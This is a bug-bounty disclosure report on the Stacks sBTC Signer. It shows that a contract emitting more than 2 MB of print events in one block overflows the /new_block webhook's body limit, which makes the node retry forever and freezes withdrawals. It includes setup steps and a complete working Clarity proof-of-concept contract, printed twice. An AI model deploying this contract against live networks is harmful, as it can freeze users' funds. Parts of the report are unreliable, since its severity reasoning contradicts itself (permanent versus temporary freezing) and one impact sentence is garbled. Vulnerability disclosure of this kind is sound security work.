#38111 [BC-High] Attackers can send a very large event in a Stacks block so that the Signer can neve

Submitted on Dec 24th 2024 at 17:11:10 UTC by @f4lc0n for Attackathon | Stacks

Report ID: #38111
Report Type: Blockchain/DLT
Report severity: High
Target: https://github.com/stacks-network/sbtc/tree/immunefi_attackaton_0.9/signer
Impacts:
- Permanent freezing of funds (fix requires hardfork)
- API crash preventing correct processing of deposits

Description

Brief/Intro

The /new_block api of Signer receives each block of Stacks and reads the events in it. Signer uses the axum::http package to run the api http service. The default payload limit of axum::http is 2M.

Attackers can emit more than 2M events in a Stacks block to make the Stacks node fail to access the Signer's /new_block. Then the Stacks node will make requests infinitely and fail infinitely, and the Signer will never be able to obtain new Stacks block events.

Vulnerability Details

The axum::extract::DefaultBodyLimit docs is as follows.

For security reasons, Bytes will, by default, not accept bodies larger than 2MB. This also applies to extractors that uses Bytes internally such as String, Json, and Form.
Extracted from: https://docs.rs/axum/latest/axum/extract/struct.DefaultBodyLimit.html

The signer/src/api/new_block.rs::new_block_handler code is as follows.

/// A handler of `POST /new_block` webhook events.
///
/// # Notes
///
/// The event dispatcher functionality in a stacks node attempts to send
/// the payload to all interested observers, one-by-one. If the node fails
/// to connect to one of the observers, or if the response from the
/// observer is not a 200-299 response code, then it sleeps for 1 second
/// and tries again[^1]. From the looks of it, the node will not stop
/// trying to send the webhook until there is a success. Because of this,
/// unless we encounter an error where retrying in a second might succeed,
/// we will return a 200 OK status code.
///
/// TODO: We need to be careful to only return a non success status code a
/// fixed number of times.
///
/// [^1]: <https://github.com/stacks-network/stacks-core/blob/09c4b066e25104be8b066e8f7530ff0c6df4ccd5/testnet/stacks-node/src/event_dispatcher.rs#L317-L385>
#[tracing::instrument(skip_all, name = "new-block")]
pub async fn new_block_handler(state: State<ApiState<impl Context>>, body: String) -> StatusCode {
    tracing::debug!("received a new block event from stacks-core");
    metrics::counter!(
        Metrics::BlocksObservedTotal,
        "blockchain" => STACKS_BLOCKCHAIN,
    )
    .increment(1);

According to the comment, we can know that Stacks node will retry infinitely until it successfully accesses the /new_block api of Signer.

Impact Details

Signer will never receive events from Stacks again. The specific impacts are as follows:

Since it cannot receive the WithdrawalCreate event, the Signer will not process the user's withdrawal request. The user's sBTC will be frozen.
Since it cannot receive the KeyRotation event, the Signer will not receive the new rotate_key. Then the Signer will process the deposits.

Since it freezes the user's funds, but it is temporary, I consider this a High.

References

None

Proof of Concept

Add some log to signer/src/api/new_block.rs. The log will print each new stacks block received

     let new_block_event: NewBlockEvent = match serde_json::from_str(&body) {
         Ok(value) => value,
         // If we are here, then we failed to deserialize the webhook body
         // into the expected type. It's unlikely that retying this webhook
         // will lead to success, so we log the error and return `200 OK` so
         // that the node does not retry the webhook.
         Err(error) => {
             tracing::error!(%body, %error, "could not deserialize POST /new_block webhook:");
             return StatusCode::OK;
         }
     };
+    tracing::info!("@audit; new_block_event.block_height: {:?}", new_block_event.block_height);

     // Although transactions can fail, only successful transactions emit
     // sBTC print events, since those events are emitted at the very end of

Add a test address to docker/stacks/stacks-regtest-miner.toml. Please replace it with your wallet address!

 [[ustx_balance]]
 # This is a 2-3 multi-sig address controlled using the above three
 # addresses. The above three accounts are also in the
 # `docker/sbtc/signer/README.md` file, and the resulting multi-sig address
 # below was created using the SignerWallet struct.
 address = "SN3R84XZYA63QS28932XQF3G1J8R9PC3W76P9CSQS"
 amount = 10000000000000000
+
+[[ustx_balance]]
+# Please replace it with your wallet address!
+address = "STHKP28RMWC458D0H7TP3SR88ZSDGB7KKV7T23KV" # auditor test address
+amount = 10000000000000000

Build docker

make devenv-up
make devenv-down
docker compose -f docker/docker-compose.yml --profile default --profile bitcoin-mempool --profile sbtc-signer build
make devenv-up

Wait for a while, use sandbox to deploy the POC contract. If you cannot deploy, please check your wallet nonce.

(define-public (run-emit-event)
  (begin
    (emit-event-1024-1024)
    (ok u1)
  )
)

(define-private (emit-event-1024-1024)
  (begin
    (emit-event-256-1024)
    (emit-event-256-1024)
    (emit-event-256-1024)
    (emit-event-256-1024)
    (emit-event-256-1024)
    (emit-event-256-1024)
    (emit-event-256-1024)
    (emit-event-256-1024)
  )
)

(define-private (emit-event-256-1024)
  (begin
    (emit-event-64-1024)
    (emit-event-64-1024)
    (emit-event-64-1024)
    (emit-event-64-1024)
    (emit-event-64-1024)
    (emit-event-64-1024)
    (emit-event-64-1024)
    (emit-event-64-1024)
  )
)

(define-private (emit-event-64-1024)
  (begin
    (emit-event-8-1024)
    (emit-event-8-1024)
    (emit-event-8-1024)
    (emit-event-8-1024)
    (emit-event-8-1024)
    (emit-event-8-1024)
    (emit-event-8-1024)
    (emit-event-8-1024)
  )
)

(define-private (emit-event-8-1024)
  (begin
    (emit-event-1024)
    (emit-event-1024)
    (emit-event-1024)
    (emit-event-1024)
    (emit-event-1024)
    (emit-event-1024)
    (emit-event-1024)
    (emit-event-1024)
  )
)

(define-private (emit-event-1024)
  (begin
    (print "ABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBB")
  )
)

Wait for a while, use sandbox to call the POC contract. If you cannot call, please check your wallet nonce and enable Allow Mode.
Then, you will find that Signer can no longer receive Stacks events.

Previous#38551 [BC-Medium] A signer can request stacks tx nonces in batches in advance and then DoS other si Next#38477 [BC-High] A single signer can abort every attempted signing round by providing an invalid pac

Last updated 7 months ago

Was this helpful?

(define-public (run-emit-event) (begin (emit-event-1024-1024) (ok u1) ) ) (define-private (emit-event-1024-1024) (begin (emit-event-256-1024) (emit-event-256-1024) (emit-event-256-1024) (emit-event-256-1024) (emit-event-256-1024) (emit-event-256-1024) (emit-event-256-1024) (emit-event-256-1024) ) ) (define-private (emit-event-256-1024) (begin (emit-event-64-1024) (emit-event-64-1024) (emit-event-64-1024) (emit-event-64-1024) (emit-event-64-1024) (emit-event-64-1024) (emit-event-64-1024) (emit-event-64-1024) ) ) (define-private (emit-event-64-1024) (begin (emit-event-8-1024) (emit-event-8-1024) (emit-event-8-1024) (emit-event-8-1024) (emit-event-8-1024) (emit-event-8-1024) (emit-event-8-1024) (emit-event-8-1024) ) ) (define-private (emit-event-8-1024) (begin (emit-event-1024) (emit-event-1024) (emit-event-1024) (emit-event-1024) (emit-event-1024) (emit-event-1024) (emit-event-1024) (emit-event-1024) ) ) (define-private (emit-event-1024) (begin (print "ABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBBABBBBBBBBBBBBBBB") ) )